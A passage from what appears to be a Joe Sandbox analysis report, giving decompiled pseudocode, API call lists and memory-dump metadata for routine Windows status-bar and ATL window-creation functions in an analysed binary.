                                                                                                                                                                                                                                                                                          					 *(_t122 - 0x2b8) = _t68;
                                                                                                                                                                                                                                                                                          					 *(_t122 - 0xa4) = 0;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t122 - 0xa0)) = 0;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t122 - 0x9c)) = 0;
                                                                                                                                                                                                                                                                                          					SendMessageA( *(_t87 + 4), 0x407, 0, _t122 - 0xa4);
                                                                                                                                                                                                                                                                                          					 *(_t122 - 0x98) = 0;
                                                                                                                                                                                                                                                                                          					E00106820(_t122 - 0x97, 0, 0x7f);
                                                                                                                                                                                                                                                                                          					 *(_t122 - 0x2c0) = 0;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t122 - 0x2bc)) = 0;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t122 - 0x2b4)) =  *(_t122 - 0xa4);
                                                                                                                                                                                                                                                                                          					_t120 = _t118 - _t122 - 0x2ac;
                                                                                                                                                                                                                                                                                          					do {
                                                                                                                                                                                                                                                                                          						_t74 =  *(_t122 + _t120 + _t116 * 4 - 0x2ac);
                                                                                                                                                                                                                                                                                          						if(_t74 != 0) {
                                                                                                                                                                                                                                                                                          							LoadStringA( *0x170c0c, _t74, _t122 - 0x98, 0x80);
                                                                                                                                                                                                                                                                                          							_t77 = lstrlenA(_t122 - 0x98);
                                                                                                                                                                                                                                                                                          							if(_t77 == 0xffffffff) {
                                                                                                                                                                                                                                                                                          								_t77 = lstrlenA(_t122 - 0x98);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							GetTextExtentPoint32A( *(_t122 - 0x2cc), _t122 - 0x98, _t77, _t122 - 0x2c0);
                                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_t122 + _t116 * 4 - 0x2ac)) =  *((intOrPtr*)(_t122 - 0x9c)) +  *((intOrPtr*)(_t122 - 0x2b4)) +  *(_t122 - 0x2c0) + 6;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_t122 + _t116 * 4 - 0x2ac)) = 0x3fffffff;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t80 =  *((intOrPtr*)(_t122 + _t116 * 4 - 0x2ac));
                                                                                                                                                                                                                                                                                          						_t116 = _t116 + 1;
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t122 - 0x2b4)) = _t80;
                                                                                                                                                                                                                                                                                          					} while (_t116 < 3);
                                                                                                                                                                                                                                                                                          					_t81 = SendMessageA( *(_t87 + 4), 0x404, 3, _t122 - 0x2ac);
                                                                                                                                                                                                                                                                                          					_t117 =  *(_t122 - 0x2cc);
                                                                                                                                                                                                                                                                                          					_t121 = _t81;
                                                                                                                                                                                                                                                                                          					SelectObject(_t117,  *(_t122 - 0x2b8));
                                                                                                                                                                                                                                                                                          					ReleaseDC( *(_t122 - 0x2c4), _t117);
                                                                                                                                                                                                                                                                                          					_t103 = _t122 - 0x2ac;
                                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(_t122 - 0x2b0)) != _t122 - 0x2ac) {
                                                                                                                                                                                                                                                                                          						E000FD040(_t122 - 0x2b0);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t62 = _t121;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] =  *((intOrPtr*)(_t122 - 0xc));
                                                                                                                                                                                                                                                                                          				_pop(_t114);
                                                                                                                                                                                                                                                                                          				_pop(_t119);
                                                                                                                                                                                                                                                                                          				_pop(_t88);
                                                                                                                                                                                                                                                                                          				return E001059E6(_t62, _t88,  *(_t122 - 0x14) ^ _t122, _t103, _t114, _t119);
                                                                                                                                                                                                                                                                                          			}





















                                                                                                                                                                                                                                                                                          0x000faa92
                                                                                                                                                                                                                                                                                          0x000faa98
                                                                                                                                                                                                                                                                                          0x000faa9e
                                                                                                                                                                                                                                                                                          0x000faaa3
                                                                                                                                                                                                                                                                                          0x000faab1
                                                                                                                                                                                                                                                                                          0x000faab7
                                                                                                                                                                                                                                                                                          0x000faabc
                                                                                                                                                                                                                                                                                          0x000faac2
                                                                                                                                                                                                                                                                                          0x000faac5
                                                                                                                                                                                                                                                                                          0x000faac9
                                                                                                                                                                                                                                                                                          0x000faad9
                                                                                                                                                                                                                                                                                          0x000faae1
                                                                                                                                                                                                                                                                                          0x000faaef
                                                                                                                                                                                                                                                                                          0x000faaff
                                                                                                                                                                                                                                                                                          0x000fab02
                                                                                                                                                                                                                                                                                          0x000fab10
                                                                                                                                                                                                                                                                                          0x000fab16
                                                                                                                                                                                                                                                                                          0x000fab1c
                                                                                                                                                                                                                                                                                          0x000fab22
                                                                                                                                                                                                                                                                                          0x000fab32
                                                                                                                                                                                                                                                                                          0x000fab39
                                                                                                                                                                                                                                                                                          0x000fab4d
                                                                                                                                                                                                                                                                                          0x000fab53
                                                                                                                                                                                                                                                                                          0x000fab59
                                                                                                                                                                                                                                                                                          0x000fab5f
                                                                                                                                                                                                                                                                                          0x000fab61
                                                                                                                                                                                                                                                                                          0x000fab64
                                                                                                                                                                                                                                                                                          0x000fab6d
                                                                                                                                                                                                                                                                                          0x000fab90
                                                                                                                                                                                                                                                                                          0x000fab9d
                                                                                                                                                                                                                                                                                          0x000faba6
                                                                                                                                                                                                                                                                                          0x000fabaf
                                                                                                                                                                                                                                                                                          0x000fabaf
                                                                                                                                                                                                                                                                                          0x000fabcb
                                                                                                                                                                                                                                                                                          0x000fabe7
                                                                                                                                                                                                                                                                                          0x000fab6f
                                                                                                                                                                                                                                                                                          0x000fab6f
                                                                                                                                                                                                                                                                                          0x000fab6f
                                                                                                                                                                                                                                                                                          0x000fabee
                                                                                                                                                                                                                                                                                          0x000fabf5
                                                                                                                                                                                                                                                                                          0x000fabf6
                                                                                                                                                                                                                                                                                          0x000fabfc
                                                                                                                                                                                                                                                                                          0x000fac17
                                                                                                                                                                                                                                                                                          0x000fac1d
                                                                                                                                                                                                                                                                                          0x000fac23
                                                                                                                                                                                                                                                                                          0x000fac2d
                                                                                                                                                                                                                                                                                          0x000fac3b
                                                                                                                                                                                                                                                                                          0x000fac41
                                                                                                                                                                                                                                                                                          0x000fac4d
                                                                                                                                                                                                                                                                                          0x000fac55
                                                                                                                                                                                                                                                                                          0x000fac55
                                                                                                                                                                                                                                                                                          0x000fac5a
                                                                                                                                                                                                                                                                                          0x000fac5a
                                                                                                                                                                                                                                                                                          0x000fac5f
                                                                                                                                                                                                                                                                                          0x000fac67
                                                                                                                                                                                                                                                                                          0x000fac68
                                                                                                                                                                                                                                                                                          0x000fac69
                                                                                                                                                                                                                                                                                          0x000fac77

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetDC.USER32(?), ref: 000FAACF
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 000FAAE7
                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 000FAAEF
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000407,00000000,?), ref: 000FAB22
                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 000FAB39
                                                                                                                                                                                                                                                                                          • LoadStringA.USER32 ref: 000FAB90
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 000FAB9D
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 000FABAF
                                                                                                                                                                                                                                                                                          • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 000FABCB
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000404,00000003,?), ref: 000FAC17
                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 000FAC2D
                                                                                                                                                                                                                                                                                          • ReleaseDC.USER32 ref: 000FAC3B
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: MessageSend$ObjectSelectlstrlen$ExtentLoadPoint32ReleaseStringText_memset
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1950834119-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 136ae4a3b4ac475f7f9c0126546a968eafcba143aa5260f9174062ace533bc7a
                                                                                                                                                                                                                                                                                          • Instruction ID: ee2c09c60ad95c90379e312e48508067704f13f79a2dfaa3d1ed0456d37cab72
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 136ae4a3b4ac475f7f9c0126546a968eafcba143aa5260f9174062ace533bc7a
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C411A71A042199FDB24CF15D988BAAB7B9BF89300F1481DAE90DA7251D770AE80CF51
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                                                                                                                          			E00103ED0(struct HMENU__* __eax, void* __ebx, struct HWND__* _a4, int* _a8, CHAR* _a12, signed int _a16, long _a20, struct HMENU__* _a24) {
                                                                                                                                                                                                                                                                                          				intOrPtr _v0;
                                                                                                                                                                                                                                                                                          				wchar_t* _v12;
                                                                                                                                                                                                                                                                                          				int _v16;
                                                                                                                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                                                                                                                          				struct _CRITICAL_SECTION* _v24;
                                                                                                                                                                                                                                                                                          				struct _WNDCLASSEXA _v72;
                                                                                                                                                                                                                                                                                          				struct _WNDCLASSEXA _v120;
                                                                                                                                                                                                                                                                                          				void* _t74;
                                                                                                                                                                                                                                                                                          				CHAR* _t81;
                                                                                                                                                                                                                                                                                          				struct HINSTANCE__* _t83;
                                                                                                                                                                                                                                                                                          				CHAR* _t86;
                                                                                                                                                                                                                                                                                          				int _t87;
                                                                                                                                                                                                                                                                                          				int* _t98;
                                                                                                                                                                                                                                                                                          				void* _t103;
                                                                                                                                                                                                                                                                                          				void* _t104;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _t129;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _t132;
                                                                                                                                                                                                                                                                                          				struct HMENU__** _t140;
                                                                                                                                                                                                                                                                                          				wchar_t* _t142;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _t145;
                                                                                                                                                                                                                                                                                          				void* _t151;
                                                                                                                                                                                                                                                                                          				void* _t152;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t104 = __ebx;
                                                                                                                                                                                                                                                                                          				_t132 = __eax;
                                                                                                                                                                                                                                                                                          				if( *((intOrPtr*)(__eax + 0x14)) != 0) {
                                                                                                                                                                                                                                                                                          					L2:
                                                                                                                                                                                                                                                                                          					_t74 =  *(_t132 + 0x14);
                                                                                                                                                                                                                                                                                          					 *_t74 = 0x42444c7;
                                                                                                                                                                                                                                                                                          					 *(_t74 + 4) = 0;
                                                                                                                                                                                                                                                                                          					 *((char*)(_t74 + 8)) = 0xe9;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t74 + 9)) = 0xfffffff3 - _t74;
                                                                                                                                                                                                                                                                                          					FlushInstructionCache(GetCurrentProcess(), _t74, 0xd);
                                                                                                                                                                                                                                                                                          					if(_t104 == 0) {
                                                                                                                                                                                                                                                                                          						goto L12;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t140 = _t132 + 8;
                                                                                                                                                                                                                                                                                          						if(_t140 == 0 || _t132 == 0) {
                                                                                                                                                                                                                                                                                          							RaiseException(0xc0000005, 1, 0, 0);
                                                                                                                                                                                                                                                                                          							asm("int3");
                                                                                                                                                                                                                                                                                          							asm("int3");
                                                                                                                                                                                                                                                                                          							asm("int3");
                                                                                                                                                                                                                                                                                          							asm("int3");
                                                                                                                                                                                                                                                                                          							asm("int3");
                                                                                                                                                                                                                                                                                          							asm("int3");
                                                                                                                                                                                                                                                                                          							asm("int3");
                                                                                                                                                                                                                                                                                          							_t152 = _t151 - 0x70;
                                                                                                                                                                                                                                                                                          							_push(_t140);
                                                                                                                                                                                                                                                                                          							_push(_t132);
                                                                                                                                                                                                                                                                                          							if(_t104 == 0 || _a4 == 0) {
                                                                                                                                                                                                                                                                                          								L22:
                                                                                                                                                                                                                                                                                          								return 0;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								if( *(_t104 + 0x40) != 0) {
                                                                                                                                                                                                                                                                                          									L33:
                                                                                                                                                                                                                                                                                          									if( *(_t104 + 0x30) != 0) {
                                                                                                                                                                                                                                                                                          										_t70 = _t104 + 0x34; // 0x0
                                                                                                                                                                                                                                                                                          										_a4->i =  *_t70;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									_t72 = _t104 + 0x40; // 0x0
                                                                                                                                                                                                                                                                                          									return  *_t72;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_v24 = 0x170c68;
                                                                                                                                                                                                                                                                                          									EnterCriticalSection(0x170c68);
                                                                                                                                                                                                                                                                                          									_v20 = 1;
                                                                                                                                                                                                                                                                                          									if( *(_t104 + 0x40) != 0) {
                                                                                                                                                                                                                                                                                          										L32:
                                                                                                                                                                                                                                                                                          										LeaveCriticalSection(0x170c68);
                                                                                                                                                                                                                                                                                          										goto L33;
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										_t29 = _t104 + 0x30; // 0x0
                                                                                                                                                                                                                                                                                          										_t81 =  *_t29;
                                                                                                                                                                                                                                                                                          										if(_t81 == 0) {
                                                                                                                                                                                                                                                                                          											if( *((intOrPtr*)(_t104 + 0x3c)) == 0) {
                                                                                                                                                                                                                                                                                          												_t83 =  *(_v0 + 8);
                                                                                                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                                                                                                          												_t83 = 0;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          											_t52 = _t104 + 0x38; // 0x7f00
                                                                                                                                                                                                                                                                                          											 *((intOrPtr*)(_t104 + 0x1c)) = LoadCursorA(_t83,  *_t52);
                                                                                                                                                                                                                                                                                          											goto L28;
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											_t30 = _t104 + 0x28; // 0x112608
                                                                                                                                                                                                                                                                                          											_t31 = _t104 + 8; // 0x104140
                                                                                                                                                                                                                                                                                          											_v12 =  *_t30;
                                                                                                                                                                                                                                                                                          											_v16 =  *_t31;
                                                                                                                                                                                                                                                                                          											_v72.cbSize = 0x30;
                                                                                                                                                                                                                                                                                          											if(GetClassInfoExA(0, _t81,  &_v72) != 0) {
                                                                                                                                                                                                                                                                                          												L23:
                                                                                                                                                                                                                                                                                          												memcpy(_t104,  &_v72, 0xc << 2);
                                                                                                                                                                                                                                                                                          												_t152 = _t152 + 0xc;
                                                                                                                                                                                                                                                                                          												_t44 = _t104 + 8; // 0x104140
                                                                                                                                                                                                                                                                                          												 *(_t104 + 0x34) =  *_t44;
                                                                                                                                                                                                                                                                                          												 *(_t104 + 0x28) = _v12;
                                                                                                                                                                                                                                                                                          												 *(_t104 + 8) = _v16;
                                                                                                                                                                                                                                                                                          												L28:
                                                                                                                                                                                                                                                                                          												 *(_t104 + 4) =  *(_t104 + 4) & 0xffffbfff;
                                                                                                                                                                                                                                                                                          												 *(_t104 + 0x14) =  *(_v0 + 4);
                                                                                                                                                                                                                                                                                          												if( *(_t104 + 0x28) == 0) {
                                                                                                                                                                                                                                                                                          													_t60 = _t104 + 0x42; // 0x15ade2
                                                                                                                                                                                                                                                                                          													_t142 = _t60;
                                                                                                                                                                                                                                                                                          													swprintf(_t142, 0x25, "ATL:%p", _t104);
                                                                                                                                                                                                                                                                                          													_t152 = _t152 + 0x10;
                                                                                                                                                                                                                                                                                          													 *(_t104 + 0x28) = _t142;
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          												_t86 = memcpy( &_v120, _t104, 0xc << 2);
                                                                                                                                                                                                                                                                                          												_t66 = _t104 + 0x14; // 0x0
                                                                                                                                                                                                                                                                                          												_t112 =  *_t66;
                                                                                                                                                                                                                                                                                          												_t87 = GetClassInfoExA( *_t66, _t86,  &_v120);
                                                                                                                                                                                                                                                                                          												 *(_t104 + 0x40) = _t87;
                                                                                                                                                                                                                                                                                          												if(_t87 == 0) {
                                                                                                                                                                                                                                                                                          													 *(_t104 + 0x40) = E000F4E50(_t104, _t112);
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          												goto L32;
                                                                                                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                                                                                                          												_t38 = _t104 + 0x30; // 0x0
                                                                                                                                                                                                                                                                                          												if(GetClassInfoExA( *(_v0 + 4),  *_t38,  &_v72) != 0) {
                                                                                                                                                                                                                                                                                          													goto L23;
                                                                                                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                                                                                                          													E00103D20( &_v24);
                                                                                                                                                                                                                                                                                          													goto L22;
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							 *_t140 = _t132;
                                                                                                                                                                                                                                                                                          							_t140[1] = GetCurrentThreadId();
                                                                                                                                                                                                                                                                                          							EnterCriticalSection(0x170c68);
                                                                                                                                                                                                                                                                                          							_t129 =  *0x170c80; // 0x0
                                                                                                                                                                                                                                                                                          							_t140[2] = _t129;
                                                                                                                                                                                                                                                                                          							 *0x170c80 = _t140;
                                                                                                                                                                                                                                                                                          							LeaveCriticalSection(0x170c68);
                                                                                                                                                                                                                                                                                          							_t145 = _a24;
                                                                                                                                                                                                                                                                                          							if(_t145 == 0 && (_a16 & 0x40000000) != 0) {
                                                                                                                                                                                                                                                                                          								_t145 = _t132;
                                                                                                                                                                                                                                                                                          								_a24 = _t145;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t98 = _a8;
                                                                                                                                                                                                                                                                                          							if(_t98 == 0) {
                                                                                                                                                                                                                                                                                          								_t98 = 0x15ad10;
                                                                                                                                                                                                                                                                                          								_a8 = 0x15ad10;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t17 =  &(_t98[1]); // 0x80000000
                                                                                                                                                                                                                                                                                          							_t19 =  &(_t98[3]); // 0x0
                                                                                                                                                                                                                                                                                          							_t20 =  &(_t98[2]); // 0x0
                                                                                                                                                                                                                                                                                          							return CreateWindowExA(_a20, _t104 & 0x0000ffff, _a12, _a16,  *_t98,  *_t17,  *_t20 -  *_t98,  *_t19 -  *_t17, _a4, _t145,  *0x170c08, 0);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t103 = E001057B1();
                                                                                                                                                                                                                                                                                          					 *(_t132 + 0x14) = _t103;
                                                                                                                                                                                                                                                                                          					if(_t103 == 0) {
                                                                                                                                                                                                                                                                                          						SetLastError(0xe);
                                                                                                                                                                                                                                                                                          						L12:
                                                                                                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						goto L2;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}

























                                                                                                                                                                                                                                                                                          0x00103ed0
                                                                                                                                                                                                                                                                                          0x00103ed5
                                                                                                                                                                                                                                                                                          0x00103edb
                                                                                                                                                                                                                                                                                          0x00103eed
                                                                                                                                                                                                                                                                                          0x00103eed
                                                                                                                                                                                                                                                                                          0x00103efa
                                                                                                                                                                                                                                                                                          0x00103f00
                                                                                                                                                                                                                                                                                          0x00103f07
                                                                                                                                                                                                                                                                                          0x00103f0b
                                                                                                                                                                                                                                                                                          0x00103f15
                                                                                                                                                                                                                                                                                          0x00103f1e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00103f24
                                                                                                                                                                                                                                                                                          0x00103f24
                                                                                                                                                                                                                                                                                          0x00103f29
                                                                                                                                                                                                                                                                                          0x00103fe3
                                                                                                                                                                                                                                                                                          0x00103fe9
                                                                                                                                                                                                                                                                                          0x00103fea
                                                                                                                                                                                                                                                                                          0x00103feb
                                                                                                                                                                                                                                                                                          0x00103fec
                                                                                                                                                                                                                                                                                          0x00103fed
                                                                                                                                                                                                                                                                                          0x00103fee
                                                                                                                                                                                                                                                                                          0x00103fef
                                                                                                                                                                                                                                                                                          0x00103ff3
                                                                                                                                                                                                                                                                                          0x00103ff6
                                                                                                                                                                                                                                                                                          0x00103ff7
                                                                                                                                                                                                                                                                                          0x00103ffa
                                                                                                                                                                                                                                                                                          0x00104078
                                                                                                                                                                                                                                                                                          0x0010407f
                                                                                                                                                                                                                                                                                          0x00104002
                                                                                                                                                                                                                                                                                          0x00104007
                                                                                                                                                                                                                                                                                          0x00104128
                                                                                                                                                                                                                                                                                          0x0010412c
                                                                                                                                                                                                                                                                                          0x0010412e
                                                                                                                                                                                                                                                                                          0x00104134
                                                                                                                                                                                                                                                                                          0x00104134
                                                                                                                                                                                                                                                                                          0x00104136
                                                                                                                                                                                                                                                                                          0x0010413f
                                                                                                                                                                                                                                                                                          0x0010400d
                                                                                                                                                                                                                                                                                          0x00104012
                                                                                                                                                                                                                                                                                          0x00104019
                                                                                                                                                                                                                                                                                          0x00104024
                                                                                                                                                                                                                                                                                          0x00104028
                                                                                                                                                                                                                                                                                          0x0010411d
                                                                                                                                                                                                                                                                                          0x00104122
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0010402e
                                                                                                                                                                                                                                                                                          0x0010402e
                                                                                                                                                                                                                                                                                          0x0010402e
                                                                                                                                                                                                                                                                                          0x00104033
                                                                                                                                                                                                                                                                                          0x001040a4
                                                                                                                                                                                                                                                                                          0x001040ad
                                                                                                                                                                                                                                                                                          0x001040a6
                                                                                                                                                                                                                                                                                          0x001040a6
                                                                                                                                                                                                                                                                                          0x001040a6
                                                                                                                                                                                                                                                                                          0x001040b0
                                                                                                                                                                                                                                                                                          0x001040bb
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00104035
                                                                                                                                                                                                                                                                                          0x00104035
                                                                                                                                                                                                                                                                                          0x00104038
                                                                                                                                                                                                                                                                                          0x00104041
                                                                                                                                                                                                                                                                                          0x0010404b
                                                                                                                                                                                                                                                                                          0x0010404e
                                                                                                                                                                                                                                                                                          0x00104059
                                                                                                                                                                                                                                                                                          0x00104080
                                                                                                                                                                                                                                                                                          0x0010408d
                                                                                                                                                                                                                                                                                          0x0010408d
                                                                                                                                                                                                                                                                                          0x0010408f
                                                                                                                                                                                                                                                                                          0x00104095
                                                                                                                                                                                                                                                                                          0x00104098
                                                                                                                                                                                                                                                                                          0x0010409b
                                                                                                                                                                                                                                                                                          0x001040be
                                                                                                                                                                                                                                                                                          0x001040c4
                                                                                                                                                                                                                                                                                          0x001040cf
                                                                                                                                                                                                                                                                                          0x001040d2
                                                                                                                                                                                                                                                                                          0x001040da
                                                                                                                                                                                                                                                                                          0x001040da
                                                                                                                                                                                                                                                                                          0x001040e0
                                                                                                                                                                                                                                                                                          0x001040e5
                                                                                                                                                                                                                                                                                          0x001040e8
                                                                                                                                                                                                                                                                                          0x001040e8
                                                                                                                                                                                                                                                                                          0x001040fc
                                                                                                                                                                                                                                                                                          0x001040fe
                                                                                                                                                                                                                                                                                          0x001040fe
                                                                                                                                                                                                                                                                                          0x00104103
                                                                                                                                                                                                                                                                                          0x00104109
                                                                                                                                                                                                                                                                                          0x00104110
                                                                                                                                                                                                                                                                                          0x00104119
                                                                                                                                                                                                                                                                                          0x00104119
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0010405b
                                                                                                                                                                                                                                                                                          0x00104061
                                                                                                                                                                                                                                                                                          0x0010406e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00104070
                                                                                                                                                                                                                                                                                          0x00104073
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00104073
                                                                                                                                                                                                                                                                                          0x0010406e
                                                                                                                                                                                                                                                                                          0x00104059
                                                                                                                                                                                                                                                                                          0x00104033
                                                                                                                                                                                                                                                                                          0x00104028
                                                                                                                                                                                                                                                                                          0x00104007
                                                                                                                                                                                                                                                                                          0x00103f37
                                                                                                                                                                                                                                                                                          0x00103f37
                                                                                                                                                                                                                                                                                          0x00103f44
                                                                                                                                                                                                                                                                                          0x00103f47
                                                                                                                                                                                                                                                                                          0x00103f4d
                                                                                                                                                                                                                                                                                          0x00103f53
                                                                                                                                                                                                                                                                                          0x00103f5b
                                                                                                                                                                                                                                                                                          0x00103f61
                                                                                                                                                                                                                                                                                          0x00103f67
                                                                                                                                                                                                                                                                                          0x00103f6c
                                                                                                                                                                                                                                                                                          0x00103f77
                                                                                                                                                                                                                                                                                          0x00103f79
                                                                                                                                                                                                                                                                                          0x00103f79
                                                                                                                                                                                                                                                                                          0x00103f7c
                                                                                                                                                                                                                                                                                          0x00103f81
                                                                                                                                                                                                                                                                                          0x00103f83
                                                                                                                                                                                                                                                                                          0x00103f88
                                                                                                                                                                                                                                                                                          0x00103f88
                                                                                                                                                                                                                                                                                          0x00103f91
                                                                                                                                                                                                                                                                                          0x00103f9e
                                                                                                                                                                                                                                                                                          0x00103fa1
                                                                                                                                                                                                                                                                                          0x00103fc5
                                                                                                                                                                                                                                                                                          0x00103fc5
                                                                                                                                                                                                                                                                                          0x00103f29
                                                                                                                                                                                                                                                                                          0x00103edd
                                                                                                                                                                                                                                                                                          0x00103edd
                                                                                                                                                                                                                                                                                          0x00103ee2
                                                                                                                                                                                                                                                                                          0x00103ee7
                                                                                                                                                                                                                                                                                          0x00103fca
                                                                                                                                                                                                                                                                                          0x00103fd1
                                                                                                                                                                                                                                                                                          0x00103fd5
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00103ee7

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,0000000D), ref: 00103F0E
                                                                                                                                                                                                                                                                                          • FlushInstructionCache.KERNEL32(00000000), ref: 00103F15
                                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00103F39
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00170C68), ref: 00103F47
                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00170C68), ref: 00103F61
                                                                                                                                                                                                                                                                                          • CreateWindowExA.USER32 ref: 00103FBC
                                                                                                                                                                                                                                                                                            • Part of subcall function 001057B1: GetProcessHeap.KERNEL32(00000000,0000000D,00000000,00000000,00104307), ref: 00105735
                                                                                                                                                                                                                                                                                            • Part of subcall function 001057B1: HeapAlloc.KERNEL32(00000000), ref: 0010573C
                                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(0000000E), ref: 00103FCA
                                                                                                                                                                                                                                                                                          • RaiseException.KERNEL32(C0000005,00000001,00000000,00000000), ref: 00103FE3
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
